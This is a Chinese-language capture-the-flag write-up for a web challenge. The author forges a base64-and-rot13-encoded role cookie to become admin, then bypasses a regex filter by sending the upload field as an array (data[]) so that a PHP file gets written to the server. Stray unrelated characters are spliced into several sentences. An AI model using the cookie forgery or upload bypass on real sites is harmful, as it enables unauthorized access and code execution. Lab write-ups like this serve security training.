題目:
分值:100分 類型:Web題目名稱:who are you?
題目內(nèi)容: 我是誰敏沉,我在哪娜氏,我要做什么顽聂?
解題過程:
- 開啟burpsuite,打開頁面,顯示"Sorry. You have no permissions."
- 查詢報文,沒有發(fā)現(xiàn)跳轉(zhuǎn)之類,只有
Cookie: role=Zjo1OiJ0aHJmZyI7有點價值 - Base64解密
Zjo1OiJ0aHJmZyI7,得到內(nèi)容是f:5:"thrfg"; -
thrfg猜測是使用了rot-13加密,解密得到guest - 順其自然推論把
admin用rot-13加密,得到nqzva - 使用Base64加密
f:5:"nqzva";,得到Zjo1OiJucXp2YSI7 - 修改
Cookie: role=Zjo1OiJucXp2YSI7后提交,頁面顯示:Hello admin, now you can upload something you are easy to forget.查看源碼:
<html><head>
<title></title>
</head>
<body>
<!-- $filename = $_POST['filename']; $data = $_POST['data']; -->Hello admin, now you can upload something you are easy to forget.
</body></html>
- 根據(jù)頁面源碼提示,打開firefox插件hackbar,Post內(nèi)容為
filename=1.php&data[]=<?php phpinfo();?>
image.png
如果直接輸入
filename=1.php&data =<?php phpinfo();?>頁面會報錯"No No No!", 因為網(wǎng)頁做了正則匹配過濾. 而用data[]=的方法烙丛,把data從字符串變成數(shù)組憎账,可以繞過正則匹配的過濾。
- 提交后頁面顯示
your file is in ./uploads/7b2fe94f4cec09a7c9818c48f4ef62471.php - 打開頁面即可拿到flag.
